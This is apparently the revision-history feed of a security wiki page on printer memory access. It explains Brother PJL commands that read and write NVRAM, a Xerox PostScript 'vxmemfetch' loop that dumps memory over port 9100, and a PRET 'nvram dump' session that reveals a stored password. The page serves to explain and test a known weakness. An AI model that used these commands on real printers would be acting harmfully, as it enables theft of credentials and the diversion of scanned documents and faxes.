http://hacking-printers.net/wiki/index.php?title=Memory_access&feed=atom&action=history
Memory access - Revision history
2024-03-29T05:48:30Z
Revision history for this page on the wiki
MediaWiki 1.26.4
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=324&oldid=prev
84.153.135.135 at 10:34, 31 January 2017
2017-01-31T10:34:21Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 10:34, 31 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l14" >Line 14:</td>
<td colspan="2" class="diff-lineno">Line 14:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>'''How to test for this attack?'''</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>'''How to test for this attack?'''</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows:</div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]]<ins class="diffchange diffchange-inline">, </ins>can be tested as follows:</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ./pret.py -q printer pjl</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ./pret.py -q printer pjl</div></td></tr>
</table>
84.153.135.135
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=180&oldid=prev
Admin: /* PJL (Brother) */
2017-01-21T11:49:01Z
<p><span dir="auto"><span class="autocomment">PJL (Brother)</span></span></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 11:49, 21 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l5" >Line 5:</td>
<td colspan="2" class="diff-lineno">Line 5:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM.</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM.</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"> </del>@PJL RNVRAM ADDRESS = X              <del class="diffchange diffchange-inline">(</del>read byte at location X<del class="diffchange diffchange-inline">)</del></div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline"><syntaxhighlight lang=sh></ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"> </del>@PJL WNVRAM ADDRESS = X DATA = Y    <del class="diffchange diffchange-inline">(</del>write byte Y to location X<del class="diffchange diffchange-inline">)</del></div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>@PJL RNVRAM ADDRESS = X              <ins class="diffchange diffchange-inline"># </ins>read byte at location X</div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>@PJL WNVRAM ADDRESS = X DATA = Y    <ins class="diffchange diffchange-inline"># </ins>write byte Y to location X</div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline"></syntaxhighlight></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead.</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead.</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=172&oldid=prev
Admin at 11:38, 21 January 2017
2017-01-21T11:38:22Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 11:38, 21 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l20" >Line 20:</td>
<td colspan="2" class="diff-lineno">Line 20:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  printer:/> nvram dump</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  printer:/> nvram dump</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  Writing copy to nvram/printer</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  Writing copy to nvram/printer</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"> ................................................................................</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ................................................................................</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ................................................................................</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ................................................................................</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>  ................................................................................</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=171&oldid=prev
Admin at 11:37, 21 January 2017
2017-01-21T11:37:48Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 11:37, 21 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l50" >Line 50:</td>
<td colspan="2" class="diff-lineno">Line 50:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;">__FORCETOC__</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>----</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>----</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=170&oldid=prev
Admin at 16:53, 20 January 2017
2017-01-20T16:53:04Z
<p></p>
<table class='diff diff-contentalign-left'>
<col class='diff-marker' />
<col class='diff-content' />
<col class='diff-marker' />
<col class='diff-content' />
<tr style='vertical-align: top;' lang='en'>
<td colspan='2' style="background-color: white; color:black; text-align: center;">← Older revision</td>
<td colspan='2' style="background-color: white; color:black; text-align: center;">Revision as of 16:53, 20 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'>−</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.</div></td><td class='diff-marker'>+</td><td style="color:black; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>If an attacker gains access to the printer's memory <ins class="diffchange diffchange-inline">or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]</ins>, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>== PJL (Brother) ==</div></td><td class='diff-marker'> </td><td style="background-color: #f9f9f9; color: #333333; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #e6e6e6; vertical-align: top; white-space: pre-wrap;"><div>== PJL (Brother) ==</div></td></tr>
</table>
Admin
http://hacking-printers.net/wiki/index.php?title=Memory_access&diff=169&oldid=prev
Admin: Created page with "If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead t..."
2017-01-20T16:49:49Z
<p>Created page with "If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead t..."</p>
<p><b>New page</b></p><div>If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.<br />
<br />
== PJL (Brother) ==<br />
<br />
For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM.<br />
<br />
@PJL RNVRAM ADDRESS = X (read byte at location X)<br />
@PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X)<br />
<br />
This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead.<br />
<br />
'''How to test for this attack?'''<br />
<br />
The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows:<br />
<br />
./pret.py -q printer pjl<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
printer:/> nvram dump<br />
Writing copy to nvram/printer<br />
................................................................................<br />
................................................................................<br />
................................................................................<br />
............................................MyS3cretPassw0rd....................<br />
................................................................................<br />
<br />
'''Who can perform this attack?'''<br />
<br />
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].<br />
<br />
== PostScript (Xerox) ==<br />
<br />
Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. Costin, Hack in Paris, 2012</ref> as show below:<br />
<br />
<syntaxhighlight lang=postscript><br />
/counter 0 def 50000 {<br />
/counter counter 1 add def<br />
currentdict /RRCustomProcs /ProcSet findresource begin<br />
begin counter 1 false vxmemfetch end end == counter<br />
} repeat<br />
</syntaxhighlight><br />
<br />
'''How to test for this attack?'''<br />
<br />
Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above.<br />
<br />
'''Who can perform this attack?'''<br />
<br />
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].<br />
<br />
__FORCETOC__<br />
<br />
----</div>
Admin